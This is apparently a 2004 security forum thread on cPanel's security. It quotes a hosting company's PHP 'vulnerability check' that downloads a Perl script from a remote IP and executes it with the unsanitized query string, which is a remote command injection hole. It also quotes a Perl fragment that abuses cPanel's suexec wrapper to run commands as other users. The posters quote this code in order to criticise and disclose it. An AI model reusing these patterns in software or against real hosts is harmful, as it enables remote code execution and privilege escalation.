Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: September 8, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 82 Members: 0 Total: 82 Full disclosure [SYSS-2024-030]: C-MOR Video Surveillance - OS Command Injection (CWE-78) [SYSS-2024-029]: C-MOR Video Surveillance - Dependency on Vulnerable Third-Party Component (CWE-1395) [SYSS-2024-028]: C-MOR Video Surveillance - Cleartext Storage of Sensitive Information (CWE-312) [SYSS-2024-027]: C-MOR Video Surveillance - Improper Privilege Management (CWE-269) [SYSS-2024-026]: C-MOR Video Surveillance - Unrestricted Upload of File with Dangerous Type (CWE-434) [SYSS-2024-025]: C-MOR Video Surveillance - Relative Path Traversal (CWE-23) Backdoor.Win32.Symmi.qua / Remote Stack Buffer Overflow (SEH) HackTool.Win32.Freezer.br (WinSpy) / Insecure CredentialStorage Backdoor.Win32.Optix.02.b / Weak Hardcoded Credentials Backdoor.Win32.JustJoke.2 1 (BackDoor Pro) / Unauthenticated Remote Command Execution Backdoor.Win32.PoisonIvy. ymw / Insecure Credential Storage [SYSS-2024-024]: C-MOR Video Surveillance - Improper Access Control (CWE-284) [SYSS-2024-023]: C-MOR Video Surveillance - SQL Injection(CWE-89) [SYSS-2024-022]: C-MOR Video Surveillance - Cross-Site Request Forgery (CWE-352) [SYSS-2024-021]: C-MOR Video Surveillance - Persistent Cross-Site Scripting (CWE-79) IT Security and Insecurity Portal www.waraxe.us Forum Index -> MySql -> How secure is Cpanel? View previous topic :: View next topic How secure is Cpanel? Posted: Wed Jun 02, 2004 2:10 pm Saladin Regular user Joined: May 26, 2004 Posts: 19 I use on my Server Cpanel and WHM Reseller Account , there i can create new SQL DB and also there is phpMyAdmin installed.. Last edited by Saladin on Thu Jun 03, 2004 7:34 am; edited 1 time in total Re: How sure is Cpanel? Posted: Wed Jun 02, 2004 9:07 pm LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman Saladin wrote: I use on my Server Cpanel and WHM Reseller Account , there i create new SQL DB and also there is phpMyAdmin installed.. ?????? Posted: Wed Jun 02, 2004 9:44 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu You mean, how secure is CPanel? I remember, that saw not so much time ago in bugtraq some report about XSS cases in CPanel... Posted: Fri Jun 04, 2004 7:30 am b0ilz Regular user Joined: May 31, 2004 Posts: 10 There was a remote root vuln in cpanel. And I saw over 5 exploits for it in under a day. Many boxes were rooted that week. Cpanel has a simple to use update feature, which saved alot of admin's asses. this bug was elementry. If that is any indication of the security in cpanel I would not say it is secure. (there has also been root post-auth, and a local root in cpanel in the last year or 2). heh Posted: Fri Jun 04, 2004 9:48 am icenix Advanced user Joined: May 13, 2004 Posts: 106 Location: Australia i wouldnt be too scared of it if i were you. its pretty secure stuff. plus if there is any bugs etc.. its easily updated in the client as Slad said... should be no probs. most of the probs are just bugs etc in the thing that just occasionally screw up. if your running it on a server you can touch...then just switch it off when you dont want to use it, and turn it on when you do.. thats always an option.. but i dont belive there should be any reall serious questioning of the security of the server when installing CPanel. ive made a topic with all sorts of Web Control Pannels you will find it usefull... it is available Here ( http://www.waraxe.us/forum/viewtopic.php?t=101 ) _________________ =[WWW.WARAXE.US]= -Forum Rules Posted: Fri Jun 04, 2004 10:22 pm Stonecold Regular user Joined: May 20, 2004 Posts: 10 Location: Virginia http://www.a-squad.com/audit/ tests some vulnerabilities but I am not sure that part of the script is just a pitch for you to switch over to their hosting. http://www.hostinglife.com/security.php is also a good link. Posted: Wed Jun 16, 2004 12:55 am b0ilz Regular user Joined: May 31, 2004 Posts: 10 This is from http://206.71.87.80/cpanel.php Code: <!-- # PROGRAM: cpanel.php # AUTHORS: Rob Brown (rob@asquad.com) # PURPOSE: Detect possible vulnerabilities # # DISCLAIMER: # THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*. # IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY. # USE AT YOUR OWN RISK. # # For secure cpanel hosting, visit A-Squad.Com --> <?php $tester = "/tmp/tests.pl"; if (!file_exists($tester)) { $testw = fopen($tester, "w"); ini_set('user_agent',__FILE__); $testr = fopen("http://206.71.87.106/tests.pl","r"); while ($s=fread($testr, 1024)) { fwrite($testw,$s); }; fclose($testw); fclose($testr); } echo `perl $tester '$QUERY_STRING' 2>&1`; ?> This is a remotely exploitable security check. buhahaha And that's not all.. check out the tests.pl script which is downloaded and ran by cpanel.php http://206.71.87.106/tests.pl Code: my $command = $q->param("command") || $default_command; my $who = $q->param("username") || $me; if ($cpanel && $common) { if ($command and $who) { my $wraptest = "/usr/local/cpanel/wrap"; $cpwrap = 1 if -x $wraptest && -u _; if ($who eq "root") { print "<li><font color=yellow><b>SKIPPED</b></font>: suEXEC <code>mod_php</code> Taint Vulnerability Test\n"; print "<a href=http://www.a-squad.com/audit/explain12.html>Explain</a>\n"; $canexe = $cpwrap; } else { mkdir $dummy, 0755; chdir $dummy; symlink("/usr/local/cpanel","cpanel"); my $dir = (getpwnam $who)[7]; open (DUMMY,">SafeFile.pm"); $ENV{HOME} = $dir; print DUMMY qq{chdir "$dir";warn "\n";\nexec <<RUN$$;\n$command\nRUN$$\n}; close DUMMY; my $out = `/usr/local/apache/bin/suexec $who $who cpanel/bin/proftpdvhosts 2>&1`; besides these security checks Cpanel is NOT secure. I've found some bugz in it. Do not listen to people who tell you anything is secure. It is probably not. Code your own shit, dont use the web for anything important, and remember.. Do not post to bugtraq.[/code] Posted: Wed Jun 16, 2004 12:59 am b0ilz Regular user Joined: May 31, 2004 Posts: 10 btw, these a-squad.com guys are retards. rm them with no remorse. Posted: Wed Jun 16, 2004 3:01 am vocal Regular user Joined: Jun 13, 2004 Posts: 18 Code: <?php $tester = "/tmp/tests.pl"; if (!file_exists($tester)) { $testw = fopen($tester, "w"); ini_set('user_agent',__FILE__); $testr = fopen("http://206.71.87.106/tests.pl","r"); while ($s=fread($testr, 1024)) { fwrite($testw,$s); }; fclose($testw); fclose($testr); } If it's in this part, I can't see it I guess you mean the $QUERY_STRING. Posted: Wed Jun 16, 2004 8:08 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Heh, they use backticks without any precaution and sanitize b0ilz wrote: This is from http://206.71.87.80/cpanel.php Code: <!-- # PROGRAM: cpanel.php # AUTHORS: Rob Brown (rob@asquad.com) # PURPOSE: Detect possible vulnerabilities # # DISCLAIMER: # THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*. # IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY. # USE AT YOUR OWN RISK. # # For secure cpanel hosting, visit A-Squad.Com --> <?php $tester = "/tmp/tests.pl"; if (!file_exists($tester)) { $testw = fopen($tester, "w"); ini_set('user_agent',__FILE__); $testr = fopen("http://206.71.87.106/tests.pl","r"); while ($s=fread($testr, 1024)) { fwrite($testw,$s); }; fclose($testw); fclose($testr); } echo `perl $tester '$QUERY_STRING' 2>&1`; ?> This is a remotely exploitable security check. buhahaha Posted: Sun Jun 27, 2004 9:05 am HypNotic Beginner Joined: Jun 26, 2004 Posts: 1 http://www.a-squad.com/audit/ _________________ Root Of The Net Posted: Fri Feb 25, 2005 11:17 am shai-tan Valuable expert Joined: Feb 22, 2005 Posts: 477 BTW If I see anyone here using zPanel that cheap rip off of cPanel I swear I'll take you down. First of all its a friken rip off and secondly it sucks ass. _________________ Shai-tan ?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds How secure is Cpanel? www.waraxe.us Forum Index -> MySql You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.124 Seconds